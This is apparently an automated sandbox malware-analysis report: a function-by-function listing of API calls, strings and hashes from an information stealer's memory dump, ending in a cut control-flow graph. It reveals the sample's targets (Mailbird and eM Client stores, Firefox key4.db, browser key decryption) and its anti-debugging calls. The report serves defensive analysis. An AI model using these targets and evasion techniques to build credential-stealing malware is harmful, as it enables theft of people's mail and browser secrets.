6847->6808 6885 40b29b-40b2a0 6847->6885 6848->6768 6850->6840 6852->6817 6866 40b327 6852->6866 6853->6808 6856->6788 6856->6795 6861->6808 6866->6808 6875->6808 6882->6808 6885->6808 6886->6768
                                                          APIs
                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,755AF770,755AF770), ref: 0040B792
                                                          • NtClose.NTDLL ref: 0040B7B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileRead
                                                          • String ID: LK$Y[$ntdll.dll
                                                          • API String ID: 752142053-4222218168
                                                          • Opcode ID: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                          • Instruction ID: 4487220ceab9a8d4c25bfe658470c8f7c93894071a863f051833b6fbd766e42f
                                                          • Opcode Fuzzy Hash: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                          • Instruction Fuzzy Hash: C0E1BDB29043058BDB249F69C59516EBAE1EB85314F25893FE485FB3D0E33C89418B9F
                                                          Function 00422177 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041F916: VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                          • NtQueryInformationProcess.NTDLL(000000FF,0000001E,?,00000004,00000000), ref: 004223A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Query$InformationProcessVirtual
                                                          • String ID: ]^4$^^4$^^4$^^4
                                                          • API String ID: 1364735940-2923853987
                                                          • Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                          • Instruction ID: e1f5519adcfceb975286f451de33aaf8cbb4e2bcda804772fdea06b08d6dcce1
                                                          • Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                          • Instruction Fuzzy Hash: CD510B31B08271ABDB24891CA68097E62D45B44314FA44D2BFDD9EB328C2ADCDD6974F
                                                          Function 0043323B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00433288
                                                          • GetSystemMetrics.USER32(00000001), ref: 004333C3
                                                          • GetSystemMetrics.USER32(00000000), ref: 0043341E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MetricsSystem$Create
                                                          • String ID: DISPLAY
                                                          • API String ID: 1087689917-865373369
                                                          • Opcode ID: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                          • Instruction ID: b761a9eed8f132f3d76dd51699d475c40aa8c4f3e32308c58242f5baaa05262b
                                                          • Opcode Fuzzy Hash: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                          • Instruction Fuzzy Hash: EA513672D041059BEF208F588845ABFB6A4EB9D312F34B563E516EB350D278CF814B9B
                                                          Function 00401FF9 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 254sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?,E3E203CD), ref: 004020D7
                                                          • ExitProcess.KERNEL32 ref: 00402428
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcessSleep
                                                          • String ID: Ku^%$Ku^%
                                                          • API String ID: 911557368-1067927601
                                                          • Opcode ID: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                          • Instruction ID: 7c1692d81d369eac2294152011f0ccab71a19272a549e25e1d59810d67b13e6b
                                                          • Opcode Fuzzy Hash: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                          • Instruction Fuzzy Hash: 82A1E571500B058BD7348E29D68862B76E0AB41714B248D3FE55BFBBE0D6FCE8459B0B
                                                          Function 004224A3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 201nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(000000FF,0000001F,?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004227D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 9a%^$M%$M%
                                                          • API String ID: 1778838933-3204844187
                                                          • Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                          • Instruction ID: a14d1243167b6357461e6519a130038910b412cbb64089044718b0755659bab4
                                                          • Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                          • Instruction Fuzzy Hash: 5A819875F04229ABCF28DF58EAD06ADB7B0AB24300FE48557D451E7351D2BC8A81CB4A
                                                          Function 0042C0DA Relevance: 6.8, Strings: 5, Instructions: 552COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %localappdata%\Mailbird\Store$*.db$Mail Clients\Mailbird$\MessageIndex$kernel32.dll
                                                          • API String ID: 0-4169501468
                                                          • Opcode ID: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                          • Instruction ID: 37c33aadf0b1a5fededcf733a2f710a0aa0d7e8b715308be68c7b56e9875aa70
                                                          • Opcode Fuzzy Hash: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                          • Instruction Fuzzy Hash: C21209B1F4022A8BDF149B98A8C25BF7661EF10314FA4452BE411FA391D72D8A41CBDF
                                                          Function 0043B362 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 550stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcmpiW.KERNELBASE(?,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0043B7A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcmpi
                                                          • String ID: VL6T$VL6T$kernel32.dll
                                                          • API String ID: 1586166983-858732239
                                                          • Opcode ID: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                          • Instruction ID: ac9e96eee08e7f4766fdf27955405b0e073298ede107f6bf942f2813ff7035d8
                                                          • Opcode Fuzzy Hash: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                          • Instruction Fuzzy Hash: F912BA71D045198BCF28CA5988967BEB6B0EB1D300F24651BDA06EB760D73CDD818BDB
                                                          Function 00430228 Relevance: 5.7, Strings: 4, Instructions: 717COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: UL6T$VL6T$VL6T$kernel32.dll
                                                          • API String ID: 4038537762-2028718673
                                                          • Opcode ID: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                          • Instruction ID: c2102a5980ece967c5cd64c746778263c5b3406957fe7555e788f878a3f1dfdb
                                                          • Opcode Fuzzy Hash: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                          • Instruction Fuzzy Hash: 99420BB1D001199BDF288A98C8656BF76B0AB18310F241767E915FB3D0D37C8E95CB9B
                                                          Function 004052D9 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 467encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00405575
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CryptDataUnprotect
                                                          • String ID: crypt32.dll$os_c576xedrypt.encry576xedpted_key
                                                          • API String ID: 834300711-975908830
                                                          • Opcode ID: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                          • Instruction ID: 8c3ac9f04a9491c7941596228a2b8d17953981cc6a452a8cfbc5ca82bdd136a5
                                                          • Opcode Fuzzy Hash: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                          • Instruction Fuzzy Hash: 4402B4B1E00A098FDF249A98DC816BFBB74EB14314F24457BE915FA3E0D37989418F5A
                                                          Function 0042F278 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,0043047B), ref: 0042F315
                                                          • lstrcatW.KERNEL32(?,\key4.db), ref: 0042F31F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: \key4.db
                                                          • API String ID: 4038537762-2908133219
                                                          • Opcode ID: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                          • Instruction ID: 3d8cc84be03ebf0018643bd6ad0f3ea75a9045ade11442e12932e6ab408eecf0
                                                          • Opcode Fuzzy Hash: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                          • Instruction Fuzzy Hash: C37198A6F0012996DF249968BC4157F23B16B92710FF40977E005DB391E27ECD8987AF
                                                          Function 0042CFBA Relevance: 5.4, Strings: 4, Instructions: 405COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                          • API String ID: 0-1928883120
                                                          • Opcode ID: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                          • Instruction ID: 9be5ae4bf1e72463837e643df42d36053b45937ac977a5871966d9d3f700dc7e
                                                          • Opcode Fuzzy Hash: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                          • Instruction Fuzzy Hash: 5CE14DB1F4012A8BDF189E54FD822BF7662AB14304FA4052BE015FA395E73DCA4187DB
                                                          Function 00453BC4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0044E224: RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                            • Part of subcall function 0044E224: GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                          • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapInformationLastTimeZone
                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                          • API String ID: 3335090040-239921721
                                                          • Opcode ID: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                          • Instruction ID: 7ab12ca904d85c611abf05cc92b1328e63041ffa610859c45aae75821d6d65e9
                                                          • Opcode Fuzzy Hash: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                          • Instruction Fuzzy Hash: DA3159B2D00115ABCB11AFA6DC4695ABB74EF05797F10406BF804A7162E7789F04CB99
                                                          Function 00438E28 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 417COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gU@
                                                          • API String ID: 0-63564854
                                                          • Opcode ID: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                          • Instruction ID: 9bb5ed087af5853c8395ebcf4a55f6806a95a7423fdc301e10d6eb9c751f7a08
                                                          • Opcode Fuzzy Hash: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                          • Instruction Fuzzy Hash: 4FE1D871D042198BDF249B6888826BEBA70BB1D310F24252FE559FB390D77CCD418B9B
                                                          Function 0040B7BB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: ntdll.dll
                                                          • API String ID: 3535843008-2227199552
                                                          • Opcode ID: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                          • Instruction ID: 07c00f1c427ac074378915b2824e934ab5066280a98a6b1b7d7a0ad64244f161
                                                          • Opcode Fuzzy Hash: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                          • Instruction Fuzzy Hash: 7DF0E992A0016279E6106A669C0197B768CDE86361F144533F815E73D1E33C8E0192FE
                                                          Function 0040B7F5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: ntdll.dll
                                                          • API String ID: 3535843008-2227199552
                                                          • Opcode ID: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                          • Instruction ID: f273f3d0fb77e3baaf18c0c5406a57793bb7cae49ecc4258f7fe46d16d2ae272
                                                          • Opcode Fuzzy Hash: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                          • Instruction Fuzzy Hash: 08C08063F8102166850175D47C035AD631CD9D8337F1C4437F91AF2301F525161D01FB
                                                          Function 02F69F2E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02F69F56
                                                          • Module32First.KERNEL32(00000000,00000224), ref: 02F69F76
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F69000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2f69000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3833638111-0
                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction ID: 056a9cd8ce9a1ab0893ef63b9dea2c2658ee486a95b735d568ab11a83d6bfd2c
                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction Fuzzy Hash: 05F096326007156FD7203BF5AC8DBBEB6ECEF497A4F110629E756910C0DBF0E8454A61
                                                          Function 004245EC Relevance: 1.7, APIs: 1, Instructions: 207nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 00424811
                                                            • Part of subcall function 004262A1: LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationLibraryLoadQuerySystem
                                                          • String ID:
                                                          • API String ID: 1217483125-0
                                                          • Opcode ID: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                          • Instruction ID: a7ee391c1cc3a25a3919c4d00fef5949a9432234e98ec336f1522245060c6ad6
                                                          • Opcode Fuzzy Hash: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                          • Instruction Fuzzy Hash: 1471C5B1B08261CBCB24DF18A58112EB6E0FBC5314FA65D1FE496EB351D63CC8858B5B
                                                          Function 00421EEB Relevance: 1.7, APIs: 1, Instructions: 153nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(000000FF,00000007,FFFFFF06,00000004,00000000), ref: 00421F7A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                          • Instruction ID: 4c19edd8aa9c17fc0a78f2ac854e6ceab7ff99fd175543fb6d48c07bc42e7691
                                                          • Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                          • Instruction Fuzzy Hash: B151B730F081359BCF248B5CAA8076DBAA5AB24315FA14517EB25E73B4C379DD81874B
                                                          Function 004244E4 Relevance: 1.6, APIs: 1, Instructions: 71nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64), ref: 004245E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationThread
                                                          • String ID:
                                                          • API String ID: 4046476035-0
                                                          • Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                          • Instruction ID: e4e78e09ab512bb18b464cd4d2f873358ef8636b72ff0900b4d62f7f8a955cf4
                                                          • Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                          • Instruction Fuzzy Hash: 372132B57046216BC7249E1CA84253EA6D4EBD8314F55593BFACBEF750D238CC809B87
                                                          Function 0042F1C2 Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(F2E4C6A8,00000000), ref: 0042F21D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                          • Instruction ID: a368c7a5dfb214292b8ef9e9d0bae651ecd455d0456980d3106c0b1a917b6dbd
                                                          • Opcode Fuzzy Hash: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                          • Instruction Fuzzy Hash: 9DF06DB1900644DFD710DF99E989B5AFBF8EB48724F10C16AE4289B751D33C5844CF68
                                                          Function 0044FB15 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                          • Instruction ID: c1995cbfc35cf923d3c3ea23a15c0124f92d8ae5a77ba2b7d44262ced24471db
                                                          • Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                          • Instruction Fuzzy Hash: AFE08C72912278EBCB15DB89C945D8AF3FCEB49B14B2500ABB501D3200C674EE04CBD4
                                                          Function 00443998 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                          • Instruction ID: 17c6e2c9dd4ac5a7344e966d1587fdb4c68b9ede7c11da59021095b760417012
                                                          • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                          • Instruction Fuzzy Hash: 09C08C7410098046EF298D10C271BA63364FBA2BCBF8005CEC4420BB46C66EAD8AD654
                                                          Function 0042F625 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 418stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4991 42f625-42f644 4992 42f64a-42f652 4991->4992 4993 42f654-42f659 4992->4993 4994 42f69b-42f6a0 4992->4994 4995 42f713-42f718 4993->4995 4996 42f65f-42f664 4993->4996 4997 42f756-42f75b 4994->4997 4998 42f6a6-42f6ab 4994->4998 4999 42f850-42f855 4995->4999 5000 42f71e-42f723 4995->5000 5001 42f7ca-42f7cf 4996->5001 5002 42f66a-42f66f 4996->5002 5003 42f761-42f766 4997->5003 5004 42f8a4-42f8a9 4997->5004 5005 42f811-42f816 4998->5005 5006 42f6b1-42f6b6 4998->5006 5019 42f85b-42f860 4999->5019 5020 42fa0e-42fa13 4999->5020 5011 42f93b-42f940 5000->5011 5012 42f729-42f72e 5000->5012 5007 42f9b0-42f9b5 5001->5007 5008 42f7d5-42f7da 5001->5008 5013 42f675-42f67a 5002->5013 5014 42f8d8-42f8dd 5002->5014 5017 42f984-42f989 5003->5017 5018 42f76c-42f771 5003->5018 5009 42fa29-42fa2e 5004->5009 5010 42f8af-42f8b4 5004->5010 5015 42f81c-42f821 5005->5015 5016 42f9dd-42f9e2 5005->5016 5021 42f8fa-42f8ff 5006->5021 5022 42f6bc-42f6c1 5006->5022 5027 42f9bb-42f9c0 5007->5027 5028 42fcd8-42fcdf 5007->5028 5023 42f7e0-42f7e5 5008->5023 5024 42fb7d-42fbad 5008->5024 5037 42fa34-42fa39 5009->5037 5038 42fab9-42fac6 5009->5038 5043 42f8ba-42f8bf 5010->5043 5044 42fa8b-42faa8 5010->5044 5053 42fc71-42fc96 5011->5053 5054 42f946-42f94b 5011->5054 5045 42f734-42f739 5012->5045 5046 42fb0d-42fb39 5012->5046 5029 42f680-42f685 5013->5029 5030 42facb-42fad9 5013->5030 5047 42f8e3-42f8e8 5014->5047 5048 42fc27-42fc4a 5014->5048 5031 42f827-42f82c 5015->5031 5032 42fbe9-42fc18 call 42f625 call 430228 5015->5032 5033 42fce4-42fcef 5016->5033 5034 42f9e8-42f9ed 5016->5034 5025 42fca5-42fcc9 5017->5025 5026 42f98f-42f994 5017->5026 5051 42fd10-42fd17 5018->5051 5052 42f777-42f77c 5018->5052 5039 42f866-42f86b 5019->5039 5040 42fa75-42fa86 lstrcatW 5019->5040 5035 42fa19-42fa1e 5020->5035 5036 42faad-42fab4 5020->5036 5049 42fc57-42fc6c lstrcatW 5021->5049 5050 42f905-42f90a 5021->5050 5041 42faf7-42fb08 lstrcatW 5022->5041 5042 42f6c7-42f6cc 5022->5042 5055 42f7eb-42f7f0 5023->5055 5056 42fbbd-42fbd2 lstrcatW * 2 call 40b7bb 5023->5056 5057 42fbb3-42fbb8 5024->5057 5058 42fc9d-42fca0 5024->5058 5063 42fcd0-42fcd3 5025->5063 5067 42fccb 5025->5067 5026->4992 5073 42f99a-42f9ab lstrcatW 5026->5073 5027->4992 5074 42f9c6-42f9d8 lstrcatW 5027->5074 5028->4992 5075 42f68b-42f690 5029->5075 5076 42fade-42fae7 5029->5076 5030->4992 5059 42f832-42f839 call 447047 5031->5059 5060 42fd1c-42fd21 5031->5060 5081 42fc1b-42fc22 5032->5081 5069 42fcf1-42fcf9 5033->5069 5070 42fcfb 5033->5070 5034->4992 5077 42f9f3-42fa09 5034->5077 5035->5070 5078 42fa24 5035->5078 5036->4992 5037->4992 5079 42fa3f-42fa70 call 419e6b call 447a80 * 2 5037->5079 5038->4992 5039->4992 5062 42f871-42f894 5039->5062 5040->4992 5041->4992 5080 42f6d2-42f6d7 5042->5080 5042->5081 5043->4992 5066 42f8c5-42f8d3 5043->5066 5044->4992 5082 42fb49-42fb6c call 447047 lstrcatW 5045->5082 5083 42f73f-42f744 5045->5083 5046->5063 5086 42fb3f-42fb44 5046->5086 5047->4992 5068 42f8ee-42f8f5 5047->5068 5048->5063 5064 42fc50-42fc55 5048->5064 5049->4992 5050->4992 5071 42f910-42f91b call 40b129 5050->5071 5051->4992 5084 